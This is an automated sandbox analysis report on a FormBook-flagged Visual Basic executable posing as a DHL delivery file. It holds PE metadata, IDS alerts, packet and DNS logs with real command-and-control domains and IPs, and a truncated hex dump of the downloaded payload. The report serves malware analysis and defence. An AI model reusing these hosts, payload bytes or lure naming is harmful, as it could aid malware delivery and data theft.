                      NameRVASizeTypeLanguageCountry
                      RT_ICON0x138d00x130data
                      RT_ICON0x135e80x2e8data
                      RT_ICON0x134c00x128GLS_BINARY_LSB_FIRST
                      RT_GROUP_ICON0x134900x30data
                      RT_VERSION0x131500x340dataEnglishUnited States

                      Imports

                      DLLImport
                      MSVBVM60.DLL_CIcos, _adj_fptan, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaExitProc, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, __vbaI2I4, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, __vbaDerefAry1, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaVarDup, _CIatan, __vbaAryCopy, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                      Version Infos

                      DescriptionData
                      Translation0x0409 0x04b0
                      LegalCopyrightTubux Electronics Co., Ltd.
                      InternalNamePINGVINER
                      FileVersion2.00
                      CompanyNameTubux Electronics Co., Ltd.
                      LegalTrademarksTubux Electronics Co., Ltd.
                      ProductNameHypocr3
                      ProductVersion2.00
                      FileDescriptionTubux Tools
                      OriginalFilenamePINGVINER.exe

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      01/05/21-10:34:34.826331TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971780192.168.0.8034.102.136.180
                      01/05/21-10:34:34.826331TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971780192.168.0.8034.102.136.180
                      01/05/21-10:34:34.826331TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971780192.168.0.8034.102.136.180
                      01/05/21-10:34:34.932907TCP1201ATTACK-RESPONSES 403 Forbidden804971734.102.136.180192.168.0.80

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jan 5, 2021 10:32:40.359563112 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:40.510030031 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.510234118 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:40.520057917 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:40.670270920 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.709104061 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.709130049 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.709144115 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.709224939 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.709243059 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.709256887 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.709273100 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.709287882 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.709304094 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.709307909 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:40.709319115 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.709465027 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:40.859675884 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.859786987 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.859823942 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.859838963 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.859872103 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.859870911 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:40.859886885 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.859900951 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:40.859905958 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.859950066 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.859963894 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.859978914 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.859994888 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.860011101 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.860024929 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.860039949 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.860053062 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:40.860057116 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.860074997 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.860090017 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.860105038 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.860121012 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.860133886 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:40.860136986 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:40.860261917 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.010479927 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.010587931 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.010631084 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.010646105 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.010684967 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.010685921 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.010700941 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.010742903 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.010756969 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.010780096 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.010795116 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.010811090 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.010824919 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.010829926 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.010870934 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.010889053 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.010901928 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.010927916 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.010945082 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.010962963 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.010982037 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.010997057 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011013031 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011028051 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011043072 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011046886 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.011059999 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011076927 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011126995 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011143923 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011152029 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.011157990 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011174917 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011189938 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011207104 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011220932 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011224985 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.011238098 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011253119 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011269093 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011282921 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011295080 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.011298895 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011316061 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011332035 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011347055 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011363029 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011378050 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011394024 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.011460066 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.011565924 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.161811113 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.161919117 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.161962032 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.161978960 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162012100 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162026882 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162064075 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162080050 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162094116 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162111998 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.162133932 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162142992 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.162151098 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162194967 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162201881 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.162210941 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162251949 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162266970 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162307024 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162322998 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162337065 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.162338972 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162377119 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.162379980 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162399054 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162437916 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162451982 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162455082 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.162492037 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162508011 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162516117 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.162552118 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162569046 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162609100 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162625074 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162662983 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162679911 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162693024 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162702084 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.162708998 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162725925 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162741899 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162755013 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162770987 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162777901 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.162789106 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162805080 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162820101 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162836075 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162851095 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162867069 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162880898 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162887096 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.162897110 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162913084 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162929058 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162941933 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162957907 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162972927 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.162988901 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.163002968 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.163017988 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.163032055 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.163038015 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.163054943 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.163068056 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.163095951 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.163125038 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.163135052 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.163152933 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.163167000 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.163182974 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.163197994 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.163213968 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.163228035 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.163244963 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.163259983 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.163275957 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.163290024 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.163305044 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:41.163311005 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:41.163448095 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:46.018208981 CET8049713162.144.5.131192.168.0.80
                      Jan 5, 2021 10:32:46.018363953 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:32:54.110503912 CET4971380192.168.0.80162.144.5.131
                      Jan 5, 2021 10:34:34.817403078 CET4971780192.168.0.8034.102.136.180
                      Jan 5, 2021 10:34:34.825128078 CET804971734.102.136.180192.168.0.80
                      Jan 5, 2021 10:34:34.825855970 CET4971780192.168.0.8034.102.136.180
                      Jan 5, 2021 10:34:34.826330900 CET4971780192.168.0.8034.102.136.180
                      Jan 5, 2021 10:34:34.834043980 CET804971734.102.136.180192.168.0.80
                      Jan 5, 2021 10:34:34.932907104 CET804971734.102.136.180192.168.0.80
                      Jan 5, 2021 10:34:34.932934046 CET804971734.102.136.180192.168.0.80
                      Jan 5, 2021 10:34:34.933309078 CET4971780192.168.0.8034.102.136.180
                      Jan 5, 2021 10:34:34.933350086 CET4971780192.168.0.8034.102.136.180
                      Jan 5, 2021 10:34:34.941216946 CET804971734.102.136.180192.168.0.80
                      Jan 5, 2021 10:34:55.877285957 CET4971980192.168.0.80198.54.126.238
                      Jan 5, 2021 10:34:56.034733057 CET8049719198.54.126.238192.168.0.80
                      Jan 5, 2021 10:34:56.034948111 CET4971980192.168.0.80198.54.126.238
                      Jan 5, 2021 10:34:56.174650908 CET4971980192.168.0.80198.54.126.238
                      Jan 5, 2021 10:34:56.335369110 CET8049719198.54.126.238192.168.0.80
                      Jan 5, 2021 10:34:56.335613012 CET4971980192.168.0.80198.54.126.238
                      Jan 5, 2021 10:34:56.335652113 CET4971980192.168.0.80198.54.126.238
                      Jan 5, 2021 10:34:56.492629051 CET8049719198.54.126.238192.168.0.80

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jan 5, 2021 10:31:20.476614952 CET6330853192.168.0.801.1.1.1
                      Jan 5, 2021 10:31:20.485492945 CET53633081.1.1.1192.168.0.80
                      Jan 5, 2021 10:31:22.025856018 CET5467053192.168.0.801.1.1.1
                      Jan 5, 2021 10:31:22.034636974 CET53546701.1.1.1192.168.0.80
                      Jan 5, 2021 10:31:23.146547079 CET6120653192.168.0.801.1.1.1
                      Jan 5, 2021 10:31:23.155169010 CET53612061.1.1.1192.168.0.80
                      Jan 5, 2021 10:31:24.484556913 CET5439653192.168.0.801.1.1.1
                      Jan 5, 2021 10:31:24.492758989 CET53543961.1.1.1192.168.0.80
                      Jan 5, 2021 10:31:30.315293074 CET5691853192.168.0.801.1.1.1
                      Jan 5, 2021 10:31:30.323424101 CET53569181.1.1.1192.168.0.80
                      Jan 5, 2021 10:31:44.728601933 CET5144553192.168.0.801.1.1.1
                      Jan 5, 2021 10:31:44.736715078 CET53514451.1.1.1192.168.0.80
                      Jan 5, 2021 10:31:49.472543001 CET5610153192.168.0.801.1.1.1
                      Jan 5, 2021 10:31:49.480735064 CET53561011.1.1.1192.168.0.80
                      Jan 5, 2021 10:32:38.844948053 CET6135953192.168.0.801.1.1.1
                      Jan 5, 2021 10:32:39.861112118 CET6135953192.168.0.809.9.9.9
                      Jan 5, 2021 10:32:40.331700087 CET53613591.1.1.1192.168.0.80
                      Jan 5, 2021 10:33:43.909835100 CET6519853192.168.0.801.1.1.1
                      Jan 5, 2021 10:33:43.917992115 CET53651981.1.1.1192.168.0.80
                      Jan 5, 2021 10:34:12.148552895 CET5332853192.168.0.801.1.1.1
                      Jan 5, 2021 10:34:12.166145086 CET53533281.1.1.1192.168.0.80
                      Jan 5, 2021 10:34:16.602983952 CET5127153192.168.0.801.1.1.1
                      Jan 5, 2021 10:34:16.645442963 CET53512711.1.1.1192.168.0.80
                      Jan 5, 2021 10:34:34.793181896 CET5290853192.168.0.801.1.1.1
                      Jan 5, 2021 10:34:34.814595938 CET53529081.1.1.1192.168.0.80
                      Jan 5, 2021 10:34:55.608465910 CET5461053192.168.0.801.1.1.1
                      Jan 5, 2021 10:34:55.616621971 CET53546101.1.1.1192.168.0.80
                      Jan 5, 2021 10:34:55.833118916 CET5372753192.168.0.801.1.1.1
                      Jan 5, 2021 10:34:55.876507044 CET53537271.1.1.1192.168.0.80
                      Jan 5, 2021 10:34:58.563570023 CET6068453192.168.0.801.1.1.1
                      Jan 5, 2021 10:34:58.571736097 CET53606841.1.1.1192.168.0.80
                      Jan 5, 2021 10:35:14.469818115 CET5317753192.168.0.801.1.1.1
                      Jan 5, 2021 10:35:14.969455957 CET53531771.1.1.1192.168.0.80

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      Jan 5, 2021 10:32:38.844948053 CET192.168.0.801.1.1.10x16bdStandard query (0)procesotg.comA (IP address)IN (0x0001)
                      Jan 5, 2021 10:32:39.861112118 CET192.168.0.809.9.9.90x16bdStandard query (0)procesotg.comA (IP address)IN (0x0001)
                      Jan 5, 2021 10:34:16.602983952 CET192.168.0.801.1.1.10x43aStandard query (0)www.amonez.comA (IP address)IN (0x0001)
                      Jan 5, 2021 10:34:34.793181896 CET192.168.0.801.1.1.10xcfcaStandard query (0)www.evolutionhvac.netA (IP address)IN (0x0001)
                      Jan 5, 2021 10:34:55.833118916 CET192.168.0.801.1.1.10x19a7Standard query (0)www.officialilluminati.netA (IP address)IN (0x0001)
                      Jan 5, 2021 10:35:14.469818115 CET192.168.0.801.1.1.10xd08bStandard query (0)www.yuneimit.comA (IP address)IN (0x0001)

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      Jan 5, 2021 10:32:40.331700087 CET1.1.1.1192.168.0.800x16bdNo error (0)procesotg.com162.144.5.131A (IP address)IN (0x0001)
                      Jan 5, 2021 10:34:16.645442963 CET1.1.1.1192.168.0.800x43aName error (3)www.amonez.comnonenoneA (IP address)IN (0x0001)
                      Jan 5, 2021 10:34:34.814595938 CET1.1.1.1192.168.0.800xcfcaNo error (0)www.evolutionhvac.netevolutionhvac.netCNAME (Canonical name)IN (0x0001)
                      Jan 5, 2021 10:34:34.814595938 CET1.1.1.1192.168.0.800xcfcaNo error (0)evolutionhvac.net34.102.136.180A (IP address)IN (0x0001)
                      Jan 5, 2021 10:34:55.876507044 CET1.1.1.1192.168.0.800x19a7No error (0)www.officialilluminati.netofficialilluminati.netCNAME (Canonical name)IN (0x0001)
                      Jan 5, 2021 10:34:55.876507044 CET1.1.1.1192.168.0.800x19a7No error (0)officialilluminati.net198.54.126.238A (IP address)IN (0x0001)
                      Jan 5, 2021 10:35:14.969455957 CET1.1.1.1192.168.0.800xd08bName error (3)www.yuneimit.comnonenoneA (IP address)IN (0x0001)

                      HTTP Request Dependency Graph

                      • procesotg.com
                      • www.evolutionhvac.net
                      • www.officialilluminati.net

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.0.8049713162.144.5.13180C:\Users\user\Desktop\DHL-Delivery.exe
                      TimestampkBytes transferredDirectionData
                      Jan 5, 2021 10:32:40.520057917 CET69OUTGET /bin_dIyfkt31.bin HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: procesotg.com
                      Cache-Control: no-cache
                      Jan 5, 2021 10:32:40.709104061 CET70INHTTP/1.1 200 OK
                      Date: Tue, 05 Jan 2021 09:32:40 GMT
                      Server: Apache
                      Upgrade: h2,h2c
                      Connection: Upgrade
                      Last-Modified: Mon, 04 Jan 2021 06:39:20 GMT
                      Accept-Ranges: bytes
                      Content-Length: 185920
                      Content-Type: application/octet-stream
                      Data Raw: 4b 40 4c 5f dd e6 61 33 69 ca 50 ee 56 60 af 05 38 28 86 bb de 68 c1 0f 8a 8d d3 30 ae d9 77 a5 82 c3 f7 df 09 a0 47 b6 3a 3c 87 41 3f a9 11 cd c5 73 e4 01 84 54 51 a5 ab 42 ef 88 09 fc 78 82 66 5b 42 8c c2 06 cb fc 5e 9b 91 0b d6 ec c2 38 ae dd bd 61 d5 bf a0 62 7f c5 8b 93 b1 75 fe e1 97 54 5b 44 9d 45 16 ea e0 b7 f3 a5 34 52 4b 41 ad 5d 6c a7 12 97 b2 ac 84 26 4f 5c e8 ae 75 72 70 32 1a 02 de dc 8d fd 0e 41 93 e2 da ce ba fc 08 4b 03 16 d3 1b d2 2d a6 c8 e4 07 b1 21 18 05 24 72 41 db 02 6c 85 bf f0 9d a3 d8 7f 54 f1 4a 07 a1 41 1e 0e 9e a5 38 ef 1e fb 1e 13 ad 40 54 22 3a c6 a8 55 27 71 65 cc 79 f5 aa fc 24 16 14 6c f6 e5 6b 72 d8 0b 05 cd 8e 21 1d 35 c3 b7 f6 52 0a c3 67 44 a5 d1 11 cf 02 55 49 b4 69 eb 94 0d 11 5d 32 f1 d0 3b 32 b2 d1 5f d2 a9 a3 98 ab 02 4a 34 53 7b fc 8d 00 56 d8 6e d4 00 a2 78 20 bb 59 e6 28 a8 b7 e9 ad 21 1c 6c 40 97 ce 9f 75 ab f5 75 a5 ed 89 44 a9 f8 9b 42 69 ed 82 32 44 26 e3 29 41 ac 91 d0 2c f0 70 fb 08 79 7c d1 cc 72 7e c6 28 96 be 0b af fe da a8 1e 86 b2 aa 14 0a 59 db 07 7c 06 63 2c ac 4e ce b3 ca 7b ea 9a 02 d1 2e f0 a4 05 53 51 df 95 23 66 6a 8d 74 6f cd ee b2 3d 65 fe f6 a4 57 7c f9 53 7f 7b 67 49 0c 89 84 39 ac 36 95 4d 94 dd 93 5e f8 60 5f 93 ae 1c b0 d3 5f 37 7b d4 9e 9d bf 5d 34 0a 87 16 4a 29 fc e9 3d 9d 39 a0 9a c9 03 b6 6f 41 4a 4c e5 06 0e dd 7d 0b 97 db 4f 6b 64 ed cb 0f 9c 6b e7 95 b8 15 c5 0c af 55 29 9a 99 dd f7 67 0d 97 73 8c 48 80 66 db 07 bd 02 4c d2 ab e7 74 03 6e b0 fb f4 6e 66 97 f9 83 0b 81 c7 b0 d6 3b 0e 8a f1 ab 2a 7a cd e7 70 3c 67 38 57 5b 87 e9 9e 90 7f e2 36 5d a7 25 61 ea 88 90 f0 58 24 69 fd 93 cb 99 b4 71 39 bf 6d 0a fc 30 25 84 89 0e 17 1a 8e 74 c0 3f 49 61 53 fc ff c3 90 ff e7 39 4c 27 40 06 e5 4b fa 69 f0 14 46 d5 34 c1 22 dc 46 62 78 e8 4f 17 61 25 2f 9e d5 79 b4 38 94 9c 20 1b b4 7f 0a 48 1e 2e 68 b3 03 2f d7 e6 88 88 5a b2 0d 2b 49 dc 56 80 38 82 c4 e8 88 08 66 af 61 bd bb 84 5a 30 2d 46 a3 b5 06 be 44 47 ae a7 9b e1 0b be 38 f7 f0 07 7d 32 ff 1d 97 20 94 1b 20 fa 37 ae ff 5f 54 a3 a9 de ac ed 55 3a 91 09 fb 9a bc 84 99 53 49 39 02 ed f9 05 36 90 12 fe 51 5e a8 23 49 2a 92 af 1f 48 70 ed f8 31 03 d8 8f bb e5 cf ab b0 df 7b 13 15 c1 de 2b 05 48 fa e4 21 2c 57 0f 96 be cf 43 4f 7e 71 d3 c5 f8 36 d3 ca 10 d0 d1 83 2d db 9d e1 f8 ca da 30 3b 26 d5 87 ef 9d 5b 26 1c 6c 72 46 67 f3 95 7d f0 a9 8e 30 34 a6 be 69 fb 39 84 7c 15 94 56 ce a5 18 1f 98 36 20 8d c6 00 39 f8 6e ba 2f df 9c 4a 79 8d b3 16 27 3d d3 93 4b a4 5a 8b 6c e8 b7 f4 6e e9 ad fa e9 c5 91 a1 b5 07 59 30 c8 b4 b9 5c 5f ec 68 dc 10 93 2b 01 07 de 2a 06 cb fc 5e c3 12 e3 df 67 0a bb 6e e1 36 61 d6 7e 23 a2 57 c6 83 6c 50 e5 fe e1 97 54 5b 44 9d 45 16 ea e0 b7 f3 a5 34 52 4b 41 ad 5d 6c a7 12 97 b2 ac 84 26 4f 5c 28 ae 75 72 7e 2d a0 0c de 68 84 30 2f f9 92 ae 17 ef ee 94 61 38 23 66 a1 74 b5 5f c7 a5 c4 64 d0 4f 76 6a 50 52 23 be 22 1e f0 d1 d0 f4 cd f8 3b 1b a2 6a 6a ce 25 7b 20 93 a8 32 cb 1e fb 1e 13 ad 40 54 89 c6 ce 42 ba ba 17 dc 23 e4 93 13 13 b9 70 ad 98 f6 28 d2 db 45 6d bc 39 8e d9 a4 d9 5e d1 4f a6 0a 38 de aa 38 b7 a8 9d 6b 36 21 5b f4 8d 2d 0d 11 5d 32 f1 d0 3b 32 b2 d1 5f d2 a9 a3 98 ab 52 0f 34 53 37 fd 8c 00 42 9c 4e 85 00 a2 78 20 bb 59 e6 28 48 b7 